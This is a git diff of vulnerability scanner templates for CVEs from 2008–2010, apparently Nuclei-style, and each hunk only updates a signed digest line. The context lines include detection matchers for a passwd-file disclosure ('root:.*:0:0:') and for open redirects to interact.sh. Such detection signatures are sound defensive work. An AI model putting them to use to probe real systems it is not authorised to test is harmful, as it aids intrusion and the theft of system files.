4a0a00473045022100aef3f723e04346fa7a2f8ac6c5abcf0174ca81a3aeb442367ae4d018f6ff964d0220337061d4274cc4456d6d13a49d5c1782ecb4b44cade9063e2389ffe246990c55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b938c60e8c8a7cd20bc22f69796f5c334d64ab877da6f492953e341d733d7f8002203fb0bad2c0aeda94b60c4b91516f5c14bdf9d896d0f522f2909e82fd69c134dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 09f37598b3..b6b2b7f97f 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fff4f0725abf21bcf55b6825cfd022b20b75e41e680ce18e4b08169f2923f78102210092bfa1840e5d2b94020d6226d2bbb157df2c1f344bef122db55ec8da3aba7044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee54a650d56dc420ab2cd0ca4b7da6e1d4470aefb0a5b763db4de353c2a875d802210080393474411db8a14129a53f0d573d8b4d6c07fc504b1cdc10d4e4fe3fa84567:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 9a5a30e923..a466106814 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202610c0f8d75d86e21ed6b2d7639a5f879540ed64700ccef63d61d5c49545056802200ccac5c2868b1a18b7542ad02343694a9839c8aa827db9bfde1ab7ba81d1844c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d4e972e654e7e0fdb1c9be76571b8e58770c362f8b2a8ba7d10022812dff36102204fa02d8b876b4f57d9285491f7f158412390db3b2daf5e37d14dab7c7221c3b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 3bc414bfff..7efbc71136 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f317aa209617a0ac0f5b27dc38710858835641d5769cd8499709bad9cc17fa84022100b0cb6a925a432d6b22fd4ee7412c7fb438956de1fe797d92627665c8aee77a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220471ab243dd315a012b99ea490ed48ce4e50658120cbc7f3819f6ff52cd20c808022100a8e468ab01772386d03cc97855ed8fff753d78a2717059e84adb3cf015ac42be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 3853c80ac2..384346aaaf 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 500 -# digest: 490a00463044022060c1d7a1d7f167f4a7725386e3770f50fc41cf720cfb3766a490be90bbfc632902207e45517728eabf9310ab9dc5a100c296a85431a2f94ce584aefb7d6c05833a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100930ae1e3a335eff7b78c478fd3c7f1177b65130a6d6b2b00ff6507a2c29d87900220537ba82e9274860321609d107916524e805cd669e6949ae5fce2998f92e135f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 5cd6bca79d..9dc9b3011d 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a004630440220694709bb733da913d91c504e5b47ba42d43a5750cb1bfd16e6318121b78ef4ec0220505df04dcfd33e5dd6d952b6a218255d7a539d4fa14ee4ff6f74e4bca772e889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220457a96d242eacfe34cca2f2ff1cc57c1cc5ed611308dc6bffa56ad0a92c73d6e02210087e391a2ffa9b4983fde51233d6d5be6ef977a43cd0fe9b3757dbc3cf0e9d425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 08dac193d9..20b017869b 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022051577f83aae8349027a0a3bfc2ed4386c0b9e1c09644dc0ddd098802e023c7e0022100e69fe1be6eeae6d3523eaf92aa776f94d0e42396edf72f348c0378ef7cd1da9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8ca49736a7b8c0aec9f8c5860d793e7488ef68491ca13ee648204e594ecc0b2022100ab12b1819929cd9c58d3ab503d707f0195967bc681338deeec777f662f6e3e24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 593684a0dd..704275e235 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -39,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100c159232e524cc33af61389e36bdf93790ac051100d465a44d101fed437d6d01902204c3f4b377b80d05a6d606971b970a5f55e7a05e99e48a7ded66295d9c1c523c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207339401bd2835f6f950554c6ac0018c6cc4b7fd10ea719732a86e3a326f007cb0221009250f60587d24f555633e34d6ded425986df98896ee5b738abb6081adba0f69a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 5fd0a54698..358ac7b2ec 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100907faaad405c2236acd897cde184a91ef45ebbb033646c1c1e188b95abf7c2c202207c5a4151cd8bfbbf28ff42b726095b019cc0d25d4d1e2105313cc0a7cbd516a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100829ed00b58b2238e75daef83f1de6e16d31213baf941088102784eeb8e640543022100ca25443330153aa61b70e451f9277a0b22873d532a042bf9d49a161bf24d3a69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index c72d74b9a3..6630d6c35a 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072b55f94dd31deffee60f3cb3634845a62d55cb762cc7ff386cbb87e86628a46022100f409fca70224214acee88679b54a62d491ea8aa4097e70f6ae316fefbf08c8dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b0d5c5572acc3ccca1d707be9727eb56b65ce20ee783af9e7ef1393353b7489022100dd9069b455bb42f7fbae654ca67c2424ccffbfc2b72bacf0837e171c3b1fea93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index adbb7963bc..db9a2435ab 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c631ca9827b32f40f6e831f6b142d509929a3a274aaa2539bd9a3bc70a6a277902202282dc777de13ade8043e5e0b684506c08b0f8362cece8841ae64f2d12922f4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220536f1cc894ce3cf0e85b85e5bfb534d8362367128c993290cb6332f890eb59c8022022ddb81c60f3d98c61792cd09001e1cd9deab00379eea3aea456c333db5e357a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index bba9dd1f0b..530ab7ace7 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009c71a1215235e49ed75ae5b6eeee4ad1e9cf5c5fbc2255aa4d4100800dbcc4ba022100814e7f6abe3bd9504fea75427a7595f0867986ff0f82ad2a6723448d3890a0ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a882ca123c81f2a2e49e2bc7c77870992353ef8c078c4e1f80e982cf5e65f8b02205d7862e6a7dcc7f0eff37efed760208296309a951067d2364340af1facf3bc63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index b3908a0866..2dd1c343ef 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bcb065b4315286d0190f8d478c738b86bc6bbf0a9eee7e6b4c473e41e01c1802022100c1f7c414f91bd4fa0876cc2bd72f1be77b892b1d20003177d66640667e38aa3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203b582bf0799fe8eed41bf99b033040c697cdeb84b48149cb9568dab054e2d36602204cd794c91493a6646d779bbaaebf8ddc31cee774754e8aabebc4ae1e127162ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index c94b362c39..e493fb98fd 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8c26e00ba2ed5716865bac39ee41243548410e07a5e04e196f13ecb86b5f6f0022029bacb42734f85338a1131945160673281e9ebda83ca881f2aba07019b4c2330:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210081289938ff47d37348a1c432d056cae319377c6a8659ff8e858dd35609b9457b0220745ff5fdd3c5abbc4b38b458ed70c592d509a44974a72662cfa3409289293e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index 2f667d64d8..6de21a49b0 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210091f181784616328a479c0a45ea51ca6e3ec45cf35125c50b1a74018f9dd535a7022100dc27152143b4d3818133866645b2e1e1f647b142875a267d0667d9e9c7c867f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df5174d851585d2516578af8b6553e7497def5a569f527375e2d3f0143662e31022100daba78902260fff75cd94a5c6b0a05013762f274840ad8e5b3da60f97510c8bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index f01c55af83..1ed6f56057 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a1f28b173218b3d629d38aced121196c827be859dc4aca670b95c7b18307b430022049aa913dbdffabe7a2c1cf439f0b580f53add89ba434c8ad0a2a22652bd51bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022062513ee604a9d29d34dcb7153194eedc8d9be58443dc13e8c5ca73f5f367f4a402210084d86a67562ae67561259251e2f6fc2be563a8bd98677bee0502c1987c8e7840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index b5d93ef051..21f20d34b5 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a8d55e39ef2ea81aef6917c75f74e1c17a628dc7048d68593bbf43b03dc8d86022100ebf7f9db037558e784a25d3fbb3d33cd5aaaa5cfef70c4974e29a2bc48f623b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022077ac2f7f5d426f627c71a956753e3ac937ec4c5a88aeeb6ddbbc0ceabfd8e1d8022100a592accb36226674dff40872fd6729e37cbecce22de1dcb1130249bc0b5b6bdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 722b3626b4..4d023caa7f 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220039a98604f42ee7ccff3678a04d529befe9dd08295868ac0d4e6e725a91cbfd10220045ad4a883e12545de1290ad6fed5f97abefbc452ac43de71e42e1904acbebb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022020c09a937f129592352efc92d0bfddc023d8f6264c1a8f59a9763293ad803297022100ad2608fa03d4e1c54c1ec7b08cef04a7085ff5659af89c9f4114db73804d12d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index d5db39f4af..6a30e6a1d1 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f241e186edb9af52a94d640b6a9e57852c75c54669bd59af1aafb3cf6ee08258022100c680d5c1c0b6b27a520c2401d2c1aa0a9978874b840bf8f52c24ba6fc4c50121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2e8909cb66e74801c898f013486f33380fcdb7b4e540c2723ded9b5328f77dd02205536951c7f324afa35572fedf0d097ebaf44a87c3e764ab45ab84935fffd92e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 3c329e28ed..e946558b22 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fd99275b8ffe3388f14498c542a677e467dc6409ffdede89b682d47aa5e98d8b02205e878695cd94db9f7e485d448c02aa9df416a8c7cfd6d160dc8197f103e279d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012d9ad7f368722bd795506b7cb90e2bd7cee1a53115cceb2fefd1829a35521410220351081f5653e9d8fd47e195e9063c5ed6a6330cb2a941ba6833c39e4cde0bc5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index d65c697fb6..443b49738d 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402200bd227f253fce18d4e4dd678a4cc08f7497a6058e0f1f1b544eb1e5ba22785f7022069b1097b262d7b9c4eb7fc023566c7c5ed00eba4c26e9dbf4400cbb4b4b9cc58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201ee9c41cfa23cc195a9cda81f7d512bc9d5a71d6bc7b5cf7ca0f06610f037fe4022100b22d02ddb979abf6c4e81216972b929a30e00b0b0b7d076fac4f1b0e6d144b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index cfb97c72cf..9b3d4214ff 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c11864aea146ea6435caa4fa55436335832385d19a76a69f9b1e4d0715768f20022064458c5f14208af4e71638abc8560be81a228ca423a9dfbcf3bed250a4e70ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a8fc91b690a1c42d755de9343824ecd93fa057b554900447a51881cad9da25a02206957982e840e20a9c5885190f22e973fc308858523a468f899691f416967b934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index fb3cb586ca..c152082cf8 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100862d6d8773869cf58419d323a548a4fe4934ffe52e1a773f8332d9c8bbb0efb60221008df16010b4804b0f237b8798cc9cdc67311efd336768a46455967917e0f4bac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201c618196b75f071f5cd5ce1916f3097220d175b2f3efff2cd8a797aa9bc37f75022100fff5144cf21e802fc0efada8855056c4c98ff6661f697ccd22ab0a8f616db722:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index 236e15ec54..2605afabbb 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100da41e43897f5784bf8aa6bc1dfb5721db7618454aaf6c4182246a13b30b47a86022100ca97f29ef3b646a1cdf2f366ed582fdbfcf01a0a1c1c32ba84089c386e96edf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022019f03b57b6f8653da2e4f83d3979012ccd565d86e342744be61866e6bce3850a022032dc9de1f44b492673bf82e254803e868519e4be9ab8a7004bf910fb4fd732aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index df5e8bf434..b582ef47bb 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200df40dfac907595943e5906f98bfab1609a82ae9c703da4b7d0fb4ea5284c2b9022073136420b9d293e938fbbd6db582642f6c0f5836eda85d321af7e0855670c72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d47b45c990754268cc5b1fecbb33fab28845b7d31bf17727d3357b363a1cd6dd022079a2d706cbcf4c4c4820f573528a648419feaff48d8171023d59e51d0a5a701f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index cd1862114e..8d98977b25 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100801f99e10fa7f37fb9a01ff4c8eb0a4b11e2193c7e16b9c3b8a0c50ca6e4a242022077c086d823e3b8131dff5b37562334ce5fb778ead2312cb35f1b49c8fc26f8fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ea7f86750cb549a46f1e62b83cdbe52ab7ee2438f7f198434de1b7dd781035402201f3fc64bf584686edf319a76e89b50741fea7b8046ba867d7f9ab8c812a9b180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index b508919698..d35f24b906 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220255aee4e219ee166e143888630a4e6af23c3e9b385d922dd866339bdc5d96be2022071f5391c8ceecfede26dd5441388c1f6728c9f693e05b50f408851b94f23f21a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201827010a50b0cdffbd66d7c97c743b79c1e91ec12d6c31b45895e3f60878c8f5022078d314e0fd5ee15339fe6e68ffd7141713a2ef41fecee2f270e38c390e24f0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 1ab406270e..c99e4afad0 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078b7a4981e20f380f36effbae103d8a364963690fa024b7b4b7f0a7731eb4faa022074cef19a8c876a25c892881ca87de44f31f764fac0538c01c8de31916e40390c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004f3ef74bd0b150b5684cba039044dded70dd782321f4db00189618b453fe111022100e23e6e84a05e8586d3140b02ecbe399fb86e79c5f6d7eba0c8eed0823d17c281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index 202d6dff4c..0097f4f0ef 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe6e90550c4cac8714140e552ca1f8dffae1d1cf10acfda1fc2a4f1eeb04e6070220261fe0eb98e8dd254ca2bcec2deb3e7ca3c6a2bb20a00488f400c2ba4764814d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c053f87dd625e09364f36b92791270a9ecdd0f7fd5a464ade4a20f0b5e394a9b0220626d4f146c0f697f1e7ac90891c8640fe32e4d2b45b21f65c64cc7f22cd10263:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 5cbc97a2ad..191e9e956e 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210087ecb7ece9df8ee3e3e0fc6760a67762868e12f33b0c59f6ea3bc3ccc135a1b10220607ba4bacb84ca32dd3502bcd9973930e71855eb417a6afbb0bc270df349b136:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099eae69836b941b1c94eb88b0962f5692421a36ab1094a26402857fa83bd483802206b321a1abb7081f815f10fa7633c3c85c4e0f8f0e7638d04452f1c9744bcc566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index ad2f84ef14..6abdfa0875 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100835d6327ecf3d8a79d891ab1671b58279390bedc0356214c4e0de666716a7abf022100e97639abcc162d391b35333f8165ab636eb06cff21510992ef20035e525b535f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b728694dae222416dc3a8702ccd34339d3b6bb4cbbfd4124aae6800246259f970220167af3f7521be48e9efc58142ff6e11d4531674931f831a0bb69fc1fe887dbad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 8436c55801..2fdc3f6b7e 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022004764a55873eedeef437f72de5243dc952d7938bf93ba6a44be94b1e3203d4b40221009e8e1775682357e291ce78522ca980a6d8238ef79e4e6f7cf72548f7e5bec5aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a3343582ba91229bff1b3a86a3fc3200c9b42cc98834fe6fca20bd18f27c677022100865128cb18b3b28f17a7aa53356eaf65251c4eb9c6e884cde774255d8419aa64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 1ce35186bb..effa4cc54f 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f11e7c1ef169ed3e6f170b354e5066def58df0ecb303905be2cb692bc749d50f022100bc2fa70ab2d2506cdd3c9d9a30d099823223d9a45ca34c9ebef974f8ebb45242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cdfbace2dd9da584a9c4fbb361e308cc5446de5ccbea1d50ec2b12541a5e99890220615c33d4f76a1b5e6656fc65028a58189dd6a77e867626a0ceac6ca65b2b93b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 72018b2ebe..dba77c8bdf 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f23347fc78c49c9e4569468806b46c1f3a0a646c189a57c6e021e848668bc52022100d08e6c11bd627fc6eb6668dd39684ae70f76f50186063a230f92a15306a6dafe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cbdf32e2c0315f089f08f26a91f81e2d4fc44af3683a72d1549869134fea0b7f02200ed04e3c0c97f378d11a2f98f9942768d5df8cfb723896c96da56064e600d7eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 8fcc70d379..902e5d7506 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e30cde27274d020eca121c42cb054cc13396f5f6f7ec473d9e230814405ba65f02207f6f47e4db6c69be8b7442d0214777a30b8b37a8b5f04dd07b5e7e12bd3c3ee5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020268f779e361916bc07ce33e39192307f3bce053f3a189e088b1f836199e7ca02201a54a5155fcfc628c13a0d8282ac74dba004ed58582cdf30fad1985c90f82252:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 7e67ccd006..4f934f0f35 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b0e6fbebe96039eec5eb535b07e2d769ebf29d714105a0e8516df81a99580eb02200d0bce9a850e85fdf23c0adde163f704107a4b53554740537a0b640c66956d6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220209bc64bb8a665a36509eadacdc44c0bb6a88c0f56964c56cd4141d335e318b602202f0c61b8aa127dc23cf7fab604944f2134d21fd06dfa4407502db7464123d301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index e84ede67dd..dbb21686a0 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220596ef1369c12f8e3a916e8f9e33299432b1178e9ce95fde59ddc34f77142d2f7022100e9739fb2c8ce4e2826687b0ebd6931d92e35a1568effea53043306c97259db88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 